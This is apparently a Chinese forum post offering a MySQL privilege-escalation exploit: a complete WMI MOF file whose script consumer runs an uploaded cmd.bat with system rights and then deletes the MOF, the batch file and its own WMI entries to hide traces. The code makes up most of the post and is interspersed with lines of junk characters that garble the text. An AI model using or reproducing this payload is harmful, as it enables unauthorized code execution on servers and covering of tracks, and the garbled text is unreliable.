Mysql 提权即时无错Mof exp

admin

这个sql提权MOF需要运行 system下的文件，不能定义路径。
/ d* \! o; L' Q2 t6 X需要将要运行的命令写入到bat上传到system32目录，然后执行。
4 X$ M7 S% ~# c4 q7 i7 r
这个sql提权MOF需要运行 system下的文件，不能定义路径。
需要将要运行的命令写入到bat上传到system32目录，然后执行。
! f) \8 T7 t, k: ^: Q
#pragma
                        namespace("\\\\.\\root\\cimv2")
& p! T  N6 e0 l- c9 v& {* f" b                        class
0 u) I6 Y+ ?% R- |! a                        MyClass547
5 f# Z# M" c7 V1 Z3 j+ J                        {           [key]
                        string
4 L& r, l- N  H" f9 g                        Name;
                        };
                        class
                        ActiveScriptEventConsumer
                        : __EventConsumer {          [key]
: G7 i% U% J7 R                        string
* _: {" @; i4 v7 I; c5 U* q                        Name;           [not_null]
                        string
                        ScriptingEngine;           string
                        ScriptFileName;           [template]
3 j! O& s) \7 w, V7 x                        string
                        ScriptText;         uint32 KillTimeout;
                        }; instance of __Win32Provider as $P {
                        Name
                        =
                        "ActiveScriptEventConsumer";     CLSID =
' w. a. {- T' x9 u$ H/ H  S                        "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
                        PerUserInitialization
% Z8 T5 g  ~" ]$ b! V                        = TRUE;
                        }; instance of __EventConsumerProviderRegistration {         Provider
& |" j1 A! z+ G5 d; W7 r                        = $P;         ConsumerClassNames
                        =
( f9 ~3 X6 E9 B5 }1 l7 f                        {"ActiveScriptEventConsumer"};
2 H8 k0 W% v0 Z                        };
                        Instance of ActiveScriptEventConsumer
                        as $cons {         Name
                        =
                        "ASEC";         ScriptingEngine
7 i% E8 Y$ B7 ]  b: y2 g                        =
4 D, V. n' P- S1 S0 E$ T                        "JScript";         ScriptText
                        =
                        "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";          };
5 f/ s* e% y/ k% }" n% ~$ [; b                        Instance of ActiveScriptEventConsumer
6 n/ e2 g0 A# Z                        as $cons2 {         Name
                        =
  R2 B1 L) B! L* K2 r                        "qndASEC";         ScriptingEngine
                        =
! y3 e% ^& ~5 U8 [8 M                        "JScript";         ScriptText
4 y- _9 u' j' i                        =
# h5 B! z3 `4 x# m1 z3 p' a+ E0 o5 A                        "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
( Y2 q" w5 r' w2 \& b1 C9 t5 X                        }; instance of __EventFilter as $Filt {         Name
                        =
                        "instfilt";         Query
7 Y* o, K- N: t. k0 X4 [  S+ ~* Y                        =
0 D. m; f2 z( C3 P6 I' M% ~                        "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\"";         QueryLanguage
                        =
                        "WQL";         }; instance of __EventFilter as $Filt2 {         Name
                        =
                        "qndfilt";         Query
                        =
                        "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\"";         QueryLanguage
# h# D# T2 c! r8 g$ w/ L+ U4 I                        =
4 t( |& A' i2 A: y                        "WQL";          }; instance of __FilterToConsumerBinding as $bind {         Consumer
, Q" B1 ?: D5 ]7 \                        = $cons;         Filter
                        = $Filt;
                        }; instance of __FilterToConsumerBinding as $bind2 {         Consumer
                        = $cons2;         Filter
; ^" M; d* u6 O3 s9 y- E                        = $Filt2;
                        }; instance of MyClass547
) l% I- M: g8 p4 X& }                        as $MyClass {         Name
                        =
                        "ClassConsumer";
& g# z0 Z! g5 \7 @                        };